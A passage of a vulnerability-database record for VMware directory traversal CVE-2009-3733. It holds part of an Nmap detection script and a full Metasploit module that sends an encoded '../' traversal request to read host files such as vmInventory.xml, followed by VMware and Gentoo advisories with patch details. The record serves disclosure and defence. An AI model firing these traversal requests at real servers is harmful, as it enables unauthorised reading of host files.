file\n\tresult, body = get_file(host, port, \"/etc/vmware/hostd/vmInventory.xml\");\n\t-- It failed -- probably not vulnerable\n\tif(not(result)) then\n\t\treturn false, \"Couldn't download file: \" .. body\n\tend\n\n\t-- Check if the file contains the proper XML\n\tif(string.find(string.lower(body), \"configroot\") == nil) then\n\t\treturn false, \"Server didn't return XML -- likely not vulnerable.\"\n\tend\n\n\tfiles = fake_xml_parse(body, \"vmxcfgpath\")\n\n\tif(#files == 0) then\n\t\treturn true, {\"No VMs appear to be installed\"}\n\tend\n\n\t-- Process each of the .vmx files if verbosity is on\n--\tif(nmap.verbosity() > 1) then\n--\t\tlocal result, file = get_file(host, port, files[1])\n--io.write(nsedebug.tostr(file))\n--\tend\n\n\treturn true, files\nend\n\naction = function(host, port)\n\t-- Try a standard ../ path\n\tlocal status, result = go(host, port)\n\n\tif(not(status)) then\n\t\treturn nil\n\tend\n\n\tlocal response = {}\n\ttable.insert(response, \"VMWare path traversal (CVE-2009-3733): VULNERABLE\")\n\n\tif(nmap.verbosity() > 1) then\n\t\ttable.insert(response, result)\n\tend\n\n\treturn stdnse.format_output(true, response)\nend", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "description": "Directory traversal vulnerability\n\nVulnerability Type: File Disclosure", "modified": "2013-04-02T00:00:00", "published": "2012-03-18T00:00:00", "id": "E-193", "href": "", "type": "dsquare", "title": "Vmware Server File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-03-09T05:35:26", "description": "This modules exploits the VMware Server Directory Traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 allows remote attackers to read arbitrary files. Common VMware server ports 80/8222 and 443/8333 SSL. If you want to download the entire VM, check out the gueststealer tool.\n", "published": "2015-06-08T09:58:22", "type": "metasploit", "title": "VMware Server Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_SERVER_DIR_TRAV", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::HttpClient\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'VMware Server Directory Traversal Vulnerability',\n 'Description' => 'This modules exploits the VMware Server Directory Traversal\n vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before\n 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5\n allows remote attackers to read arbitrary files. Common VMware server ports\n 80/8222 and 443/8333 SSL. If you want to download the entire VM, check out\n the gueststealer tool.',\n 'Author' => 'CG' ,\n 'License' => MSF_LICENSE,\n 'References'\t=>\n [\n [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],\n [ 'OSVDB', '59440' ],\n [ 'BID', '36842' ],\n [ 'CVE', '2009-3733' ],\n [ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]\n ]\n )\n register_options(\n [\n Opt::RPORT(8222),\n OptString.new('FILE', [ true, \"The file to view\", '/etc/vmware/hostd/vmInventory.xml']),\n OptString.new('TRAV', [ true, \"Traversal Depth\", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),\n ])\n end\n\n def run_host(target_host)\n\n begin\n file = datastore['FILE']\n trav = datastore['TRAV']\n res = send_request_raw({\n 'uri' => trav+file,\n 'version' => '1.1',\n 'method' => 'GET'\n }, 25)\n\n if res.nil?\n print_error(\"Connection timed out\")\n return\n end\n\n if res.code == 200\n #print_status(\"Output Of Requested File:\\n#{res.body}\")\n print_good(\"#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability\")\n report_vuln(\n {\n :host => target_host,\n :port\t=> rport,\n :proto => 'tcp',\n :name\t=> self.name,\n :info => \"Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }\n )\n else\n vprint_status(\"Received #{res.code} for #{trav}#{file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n print_error(e.message)\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb"}], "vmware": [{"lastseen": "2019-11-06T16:05:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2267", "CVE-2009-3733"], "description": "a. Mishandled exception on page faults \n \nAn improper setting of the exception code on page faults may allow for local privilege escalation on the guest operating system. This vulnerability does not affect the host system. \nVMware would like to thank Tavis Ormandy and Julien Tinnes of the Google Security Team for reporting this issue to us. \nThe Common Vulnerabilities and Exposures project ([cve.mitre.org](<http://www.cve.mitre.org/>)) has assigned the name CVE-2009-2267 to this issue. \nThe following table lists what action remediates the vulnerability (column 4) if a solution is available. \n\n", "edition": 4, "modified": "2009-10-27T00:00:00", "published": "2009-10-27T00:00:00", "id": "VMSA-2009-0015", "href": "https://www.vmware.com/security/advisories/VMSA-2009-0015.html", "title": "VMware hosted products and ESX patches resolve two security issues", "type": "vmware", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-2267", "CVE-2009-3733"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2009-0015\r\nSynopsis: VMware hosted products and ESX patches resolve two\r\n security issues\r\nIssue date: 2009-10-27\r\nUpdated on: 2009-10-27 (initial release of advisory)\r\nCVE numbers: CVE-2009-2267 CVE-2009-3733\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware hosted products and ESX patches resolve two security issues.\r\n\r\n2. Relevant releases\r\n\r\n VMware Workstation 6.5.2 and earlier,\r\n VMware Player 2.5.2 and earlier,\r\n VMware ACE 2.5.2 and earlier,\r\n VMware Server 2.0.1 and earlier,\r\n VMware Server 1.0.9 and earlier,\r\n VMware Fusion 2.0.5 and earlier,\r\n\r\n VMware ESXi 4.0 without patch ESXi400-200909401-BG,\r\n\r\n VMware ESXi 3.5 without patches ESXe350-200910401-I-SG,\r\n ESXe350-200901401-I-SG,\r\n\r\n VMware ESX 4.0 without patch ESX400-200909401-BG,\r\n\r\n VMware ESX 3.5 without patches ESX350-200910401-SG\r\n ESX350-200901401-SG,\r\n\r\n VMware ESX 3.0.3 without patches ESX303-200910401-BG,\r\n ESX303-200812406-BG,\r\n\r\n VMware ESX 2.5.5 without Upgrade Patch 15.\r\n\r\n Extended support for ESX 2.5.5 ends on 2010-06-15. Users should plan\r\n to upgrade to at least ESX 3.0.3 and preferably to the newest\r\n release available.\r\n\r\n Extended support for ESX 3.0.3 ends on 2011-12-10. Users should plan\r\n to upgrade to at least ESX 3.5 and preferably to the newest release\r\n available.\r\n\r\n3. Problem Description\r\n\r\n a. Mishandled exception on page faults\r\n\r\n An improper setting of the exception code on page faults may allow\r\n for local privilege escalation on the guest operating system. This\r\n vulnerability does not affect the host system.\r\n\r\n VMware would like to thank Tavis Ormandy and Julien Tinnes of the\r\n Google Security Team for reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2009-2267 to this issue.\r\n\r\n The following table lists what action remediates the vulnerability\r\n (column 4) if a solution is available. See above for remediation\r\n details.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n VirtualCenter any Windows not affected\r\n\r\n Workstation 6.5.x any 6.5.3 build 185404 or later\r\n \r\n Player 2.5.x any 2.5.3 build 185404 or later\r\n \r\n ACE 2.5.x any 2.5.3 build 185404 or later \r\n \r\n Server 2.x any 2.0.2 build 203138 or later\r\n Server 1.x any 1.0.10 build 203137 or later\r\n\r\n Fusion 2.x Mac OS/X 2.0.6 build 196839 or later\r\n\r\n ESXi 4.0 ESXi ESXi400-200909401-BG\r\n ESXi 3.5 ESXi ESXe350-200910401-I-SG\r\n\r\n ESX 4.0 ESX ESX400-200909401-BG\r\n ESX 3.5 ESX ESX350-200910401-SG\r\n ESX 3.0.3 ESX ESX303-200910401-BG\r\n ESX 2.5.5 ESX Upgrade Patch 15\r\n\r\n b. Directory Traversal vulnerability\r\n\r\n A directory traversal vulnerability allows for remote retrieval of\r\n any file from the host system. In order to send a malicious request,\r\n the attacker will need to have access to the network on which the\r\n host resides.\r\n\r\n VMware would like to thank Justin Morehouse and Jason Kratzer for\r\n independently reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2009-3733 to this issue.\r\n\r\n The following table lists what action remediates the vulnerability\r\n (column 4) if a solution is available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n VirtualCenter any Windows not affected\r\n\r\n Workstation any any not affected\r\n\r\n Player any any not affected\r\n\r\n ACE any Windows not affected\r\n\r\n Server 2.x Windows not affected\r\n Server 2.x Linux 2.0.2 build 203138 or later\r\n Server 1.x Windows not affected\r\n Server 1.x Linux 1.0.10 build 203137 or later\r\n\r\n Fusion 2.x Mac OS/X not affected\r\n\r\n ESXi 4.0 ESXi not affected\r\n ESXi 3.5 ESXi ESXe350-200901401-I-SG \r\n\r\n ESX 4.0 ESX not affected\r\n ESX 3.5 ESX ESX350-200901401-SG\r\n ESX 3.0.3 ESX ESX303-200812406-BG\r\n ESX 2.5.5 ESX not affected\r\n\r\n Note: On ESX these vulnerabilities can be exploited remotely only\r\n if the attacker has access to the Service Console network.\r\n\r\n Security best practices provided by VMware recommend that the\r\n Service Console be isolated from the VM network. Please see\r\n http://www.vmware.com/resources/techresources/726 for more\r\n information on VMware security best practices.\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and version\r\n and verify the md5sum and/or the sha1sum of your downloaded file.\r\n\r\n VMware Workstation 6.5.3\r\n ------------------------\r\n http://www.vmware.com/download/ws/\r\n Release notes:\r\n http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html\r\n\r\n For Windows\r\n\r\n Workstation for Windows 32-bit and 64-bit\r\n Windows 32-bit and 64-bit .exe\r\n md5sum: 7565d16b7d7e0173b90c3b76ca4656bc\r\n sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1\r\n \r\n For Linux\r\n\r\n Workstation for Linux 32-bit\r\n Linux 32-bit .rpm\r\n md5sum: 4d55c491bd008ded0ea19f373d1d1fd4\r\n sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e\r\n\r\n Workstation for Linux 32-bit\r\n Linux 32-bit .bundle\r\n md5sum: d4a721c1918c0e8a87c6fa4bad49ad35\r\n sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5\r\n\r\n Workstation for Linux 64-bit\r\n Linux 64-bit .rpm\r\n md5sum: 72adfdb03de4959f044fcb983412ae7c\r\n sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb\r\n\r\n Workstation for Linux 64-bit\r\n Linux 64-bit .bundle\r\n md5sum: 83e1f0c94d6974286256c4d3b559e854\r\n sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542\r\n\r\n\r\n VMware Player 2.5.3\r\n -------------------\r\n http://www.vmware.com/download/player/\r\n Release notes:\r\n http://www.vmware.com/support/player25/doc/releasenotes_player253.html\r\n\r\n Player for Windows binary\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.ex\r\ne\r\n md5sum: fe28f193374c9457752ee16cd6cad4e7\r\n sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04\r\n\r\n Player for Linux (.rpm)\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i3\r\n86.rpm\r\n md5sum: c99cd65f19fdfc7651bcb7f328b73bc2\r\n sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e\r\n\r\n Player for Linux (.bundle)\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i3\r\n86.bundle\r\n md5sum: 210f4cb5615bd3b2171bc054b9b2bac5\r\n sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b\r\n\r\n Player for Linux - 64-bit (.rpm)\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x8\r\n6_64.rpm\r\n md5sum: f91576ef90b322d83225117ae9335968\r\n sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974\r\n\r\n Player for Linux - 64-bit (.bundle)\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x8\r\n6_64.bundle\r\n md5sum: 595d44d7945c129b1aeb679d2f001b05\r\n sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4\r\n\r\n\r\n VMware ACE 2.5.3\r\n ----------------\r\n http://www.vmware.com/download/ace/\r\n Release notes:\r\n http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html\r\n\r\n ACE Management Server Virtual Appliance\r\n AMS Virtual Appliance .zip\r\n md5sum: 44cc7b86353047f02cf6ea0653e38418\r\n sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1\r\n\r\n VMware ACE for Windows 32-bit and 64-bit\r\n Windows 32-bit and 64-bit .exe\r\n md5sum: 0779da73408c5e649e0fd1c62d23820f\r\n sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef\r\n\r\n ACE Management Server for Windows\r\n Windows .exe\r\n md5sum: 0779da73408c5e649e0fd1c62d23820f\r\n sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef\r\n\r\n ACE Management Server for SUSE Enterprise Linux 9\r\n SLES 9 .rpm\r\n md5sum: a4fc92d7197f0d569361cdf4b8cca642\r\n sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75\r\n\r\n ACE Management Server for Red Hat Enterprise Linux 4\r\n RHEL 4 .rpm\r\n md5sum: 841005151338c8b954f08d035815fd58\r\n sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e\r\n\r\n\r\n VMware Server 2.0.2\r\n -------------------\r\n http://www.vmware.com/download/server/\r\n Release notes:\r\n http://www.vmware.com/support/server2/doc/releasenotes_vmserver202.html\r\n\r\n VMware Server 2\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 507 MB EXE image VMware Server 2 for Windows Operating Systems. A\r\n master installer file containing all Windows components of VMware\r\n Server.\r\n md5sum: a6430bcc16ff7b3a29bb8da1704fc38a\r\n sha1sum: 39683e7333732cf879ff0b34f66e693dde0e340b\r\n\r\n VIX API 1.6 for Windows\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 37 MB image\r\n md5sum: 827e65e70803ec65ade62dd27a74407a\r\n sha1sum: a14281bc055271a19be3c88026e92304bc3f0e22\r\n\r\n For Linux\r\n\r\n VMware Server 2 for Linux Operating Systems.\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 37 MB TAR image\r\n md5sum: 95ddea5a0579a35887bd15b083ffea20\r\n sha1sum: 14cf12063a7480f240ccd96178ad4258cb26a747\r\n\r\n VMware Server 2 for Linux Operating Systems 64-bit version.\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 452 MB RPM image\r\n md5sum: 35c8b176601133749e4055e0034f8be6\r\n sha1sum: e8dc842d89899df5cd3e1136af76f19ca5ccbece\r\n\r\n The core application needed to run VMware Server 2, 64-bit version.\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 451 MB TAR image\r\n md5sum: cc7aef813008eeb7150c21547d431b39\r\n sha1sum: b65d3d46dc947fc7995bda354c4947afabd23474\r\n \r\n VMware Server 1.0.10\r\n --------------------\r\n http://www.vmware.com/download/server/\r\n Release notes:\r\n http://www.vmware.com/support/server/doc/releasenotes_server.html\r\n\r\n VMware Server for Windows 32-bit and 64-bit\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-installer-1.0.1\r\n0-203137.exe\r\n md5sum: 867abd4843f88908ba2dbaf4547a1190\r\n sha1sum: 780e61ac190dd2b6524c8c7792564b7548c4d5a1\r\n\r\n VMware Server Windows client package\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-win32-client-1.\r\n0.10-203137.zip\r\n md5sum: f7a4eb7f48e42b9040a73721e6d61b7f\r\n sha1sum: 3a209d0fc86dbc69881614fdeb084e9c7d343f5a\r\n\r\n VMware Server for Linux\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-1.0.10-203137.t\r\nar.gz\r\n md5sum: eb127d30dbd5f7f08e5d129d68cb0d21\r\n sha1sum: f21ed65a500b2176166d90ed2821892ce1cb1fd5\r\n\r\n VMware Server for Linux rpm\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-1.0.10-203137.i\r\n386.rpm\r\n md5sum: fd4416bcc1c53d83b493b9d941a4701c\r\n sha1sum: aba35050f23cfbe027e004547559e78a38bcb6a1\r\n\r\n Management Interface\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-mui-1.0.10-203137.tar.\r\ngz\r\n md5sum: 0f01e9bdeee3fa2aa84f87f66b69dc83\r\n sha1sum: 3b6a5b222cece1de97e9513717e25178e79707e6\r\n\r\n VMware Server Linux client package\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-linux-client-1.\r\n0.10-203137.zip\r\n md5sum: 542c5aa052c9a197c4f5eeca6c3d88cc\r\n sha1sum: 3f92c98153f5d9dcbbcd0cd524683a6832aaa10e\r\n\r\n\r\n VMware Fusion 2.0.6\r\n -------------------\r\n VMware Fusion 2.0.6 (for Intel-based Macs): Download including\r\n VMware Fusion and a 12 month complimentary subscription to McAfee\r\n VirusScan Plus 2009\r\n md5sum: d35490aa8caa92e21339c95c77314b2f\r\n sha1sum: 9c41985d754ac718032a47af8a3f98ea28fddb26\r\n\r\n VMware Fusion 2.0.6 (for Intel-based Macs): Download including only\r\n VMware Fusion software\r\n md5sum: 2e8d39defdffed224c4bab4218cc6659\r\n sha1sum: 453d54a2f37b257a0aad17c95843305250c7b6ef\r\n\r\n Release notes\r\n www.vmware.com/support/fusion2/doc/releasenotes_fusion_206.html\r\n\r\n\r\n ESXi\r\n ----\r\n ESXi 4.0 patch ESXi400-200909401-BG (Privilege Escalation)\r\n \r\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-149-20090917-785\r\n671/ESXi400-200909001.zip\r\n md5sum: 8e095684c54df259eaf5705f5bfc1463\r\n sha1sum: 8f3174c119ba27269c5bb9b0767fc72778438ade\r\n http://kb.vmware.com/kb/1014026\r\n\r\n ESXi 3.5 patch ESXe350-200910401-I-SG (Privilege Escalation)\r\n http://download3.vmware.com/software/vi/ESXe350-200910401-O-SG.zip\r\n md5sum: 947874a28a7f85caffc884c6ff3a0a60\r\n http://kb.vmware.com/kb/1014761\r\n\r\n ESXi 3.5 patch ESXe350-200901401-I-SG (Directory Traversal)\r\n http://download3.vmware.com/software/vi/ESXe350-200901401-O-SG.zip\r\n md5sum: 588dc7bfdee4e4c5ac626906c37fc784 \r\n http://kb.vmware.com/kb/1006661\r\n\r\n NOTES: The three ESXi patches for Firmware "I", VMware Tools "T,"\r\n and the VI Client "C" are contained in a single offline "O"\r\n download file.\r\n\r\n\r\n ESX\r\n ---\r\n ESX 4.0 patch ESX400-200909401-BG (Privilege Escalation)\r\n \r\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-150-20090917-796\r\n862/ESX400-200909001.zip\r\n md5sum: b1487ab823746a83b897caa9d9329f48\r\n sha1sum: f426a11ec6420d9bd2f45f6ca30773a839cb3a65\r\n http://kb.vmware.com/kb/1014019\r\n\r\n Note: ESX400-200909001 contains the bundle with the security fix,\r\n ESX400-200909401-BG\r\n To install an individual bulletin use esxupdate with the -b option.\r\n esxupdate --bundle ESX400-200909001 -b ESX400-200909401-BG\r\n\r\n ESX 3.5 patch ESX350-200910401-SG (Privilege Escalation)\r\n http://download3.vmware.com/software/vi/ESX350-200910401-SG.zip\r\n md5sum: 73435b0495a61b00bedbead140b2a262\r\n sha1sum: a957d57cf0df58d8a40759dce62efbf12a6c229c\r\n http://kb.vmware.com/kb/1013124\r\n\r\n ESX 3.5 patch ESX350-200901401-SG (Directory Traversal)\r\n http://download3.vmware.com/software/vi/ESX350-200901401-SG.zip\r\n md5sum: 2769ac30078656b01ca1e2fdfa3230e9 \r\n http://kb.vmware.com/kb/1006651\r\n\r\n ESX 3.0.3 patch ESX303-200910401-BG (Privilege Escalation)\r\n http://download3.vmware.com/software/vi/ESX303-200910401-BG.zip\r\n md5sum: c7c8f76a2a704c1818eeb54500c28d1c\r\n http://kb.vmware.com/kb/1014759\r\n\r\n ESX 3.0.3 patch ESX303-200812406-BG (Directory Traversal)\r\n http://download3.vmware.com/software/vi/ESX303-200812406-BG.zip\r\n md5sum: 94ff158e94dd7a0e5b1e5e7aade7a523\r\n http://kb.vmware.com/kb/1007215\r\n\r\n ESX 2.5.5 Upgrade Patch 15 (Privilege Escalation)\r\n http://download3.vmware.com/software/esx/esx-2.5.5-191611-upgrade.tar.gz\r\n md5sum: c346fe510b6e51145570e03083f77357\r\n sha1sum: ef6b19247825fb3fe2c55f8fda3cdd05ac7bb1f4\r\n http://www.vmware.com/support/esx25/doc/esx-255-200910-patch.html\r\n\r\n\r\n5. References\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2267\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733\r\n \r\n \r\n6. Change log\r\n\r\n2009-10-27 VMSA-2009-0015\r\nInitial security advisory after release of Server 1.0.10, Server 2.0.2\r\nand Upgrade Patch 15 for ESX 2.5.5 on 2009-10-27. The versions of\r\nWorkstation, Player, ACE, Fusion, and patches for ESXi 4.0, ESXi 3.5,\r\nESX 4.0, ESX 3.5, ESX 3.0.3 mentioned above have already been released.\r\n\r\n- -----------------------------------------------------------------------\r\n7. Contact\r\n\r\nE-mail list for product security notifications and announcements:\r\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\nThis Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\nE-mail: security at vmware.com\r\nPGP key at: http://kb.vmware.com/kb/1055\r\n\r\nVMware Security Center\r\nhttp://www.vmware.com/security\r\n\r\nVMware security response policy\r\nhttp://www.vmware.com/support/policies/security_response.html\r\n\r\nGeneral support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos.html\r\n\r\nVMware Infrastructure support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos_vi.html\r\n\r\nCopyright 2009 VMware Inc. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 9.8.3 (Build 4028)\r\nCharset: utf-8\r\n\r\nwj8DBQFK50xMS2KysvBH1xkRAtDQAJ4j8i4FSanVEdj2zXOKGhz+jCN9ogCeJTow\r\nByoB8aJdMwQ3mswOBWDjR5k=\r\n=0Ncp\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-10-29T00:00:00", "published": "2009-10-29T00:00:00", "id": "SECURITYVULNS:DOC:22713", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22713", "title": "VMSA-2009-0015 VMware hosted products and ESX patches resolve two security issues", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-2267", "CVE-2009-3733"], "description": "Privilege escalation in guest system. Directory traversal on access from guest to host system.", "edition": 1, "modified": "2009-10-29T00:00:00", "published": "2009-10-29T00:00:00", "id": "SECURITYVULNS:VULN:10360", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10360", "title": "VMWare multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:55", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0967", "CVE-2008-2101", "CVE-2007-5503", "CVE-2008-4915", "CVE-2009-3707", "CVE-2008-2098", "CVE-2008-1361", "CVE-2008-4916", "CVE-2008-1447", "CVE-2008-1392", "CVE-2009-3732", "CVE-2008-1808", "CVE-2010-1137", "CVE-2009-0040", "CVE-2007-5269", "CVE-2010-1139", "CVE-2010-1142", "CVE-2008-1364", "CVE-2009-2267", "CVE-2008-2100", "CVE-2009-0910", "CVE-2010-1138", "CVE-2010-1143", "CVE-2010-1140", "CVE-2009-1244", "CVE-2011-3868", "CVE-2008-1363", "CVE-2007-5671", "CVE-2008-1340", "CVE-2009-3733", "CVE-2008-4917", "CVE-2008-1807", "CVE-2009-0909", "CVE-2009-4811", "CVE-2008-1362", "CVE-2008-1806", "CVE-2010-1141"], "description": "### Background\n\nVMware Player, Server, and Workstation allow emulation of a complete PC on a PC without the usual performance overhead of most emulators. \n\n### Description\n\nMultiple vulnerabilities have been discovered in VMware Player, Server, and Workstation. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nLocal users may be able to gain escalated privileges, cause a Denial of Service, or gain sensitive information. \n\nA remote attacker could entice a user to open a specially crafted file, possibly resulting in the remote execution of arbitrary code, or a Denial of Service. Remote attackers also may be able to spoof DNS traffic, read arbitrary files, or inject arbitrary web script to the VMware Server Console. \n\nFurthermore, guest OS users may be able to execute arbitrary code on the host OS, gain escalated privileges on the guest OS, or cause a Denial of Service (crash the host OS). \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nGentoo discontinued support for VMware Player. We recommend that users unmerge VMware Player: \n \n \n # emerge --unmerge \"app-emulation/vmware-player\"\n \n\nNOTE: Users could upgrade to \u201c>=app-emulation/vmware-player-3.1.5\u201d, however these packages are not currently stable. \n\nGentoo discontinued support for VMware Workstation. We recommend that users unmerge VMware Workstation: \n \n \n # emerge --unmerge \"app-emulation/vmware-workstation\"\n \n\nNOTE: Users could upgrade to \u201c>=app-emulation/vmware-workstation-7.1.5\u201d, however these packages are not currently stable. \n\nGentoo discontinued support for VMware Server. We recommend that users unmerge VMware Server: \n \n \n # emerge --unmerge \"app-emulation/vmware-server\"", "edition": 1, "modified": "2012-09-29T00:00:00", "published": "2012-09-29T00:00:00", "id": "GLSA-201209-25", "href": "https://security.gentoo.org/glsa/201209-25", "type": "gentoo", "title": "VMware Player, Server, Workstation: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}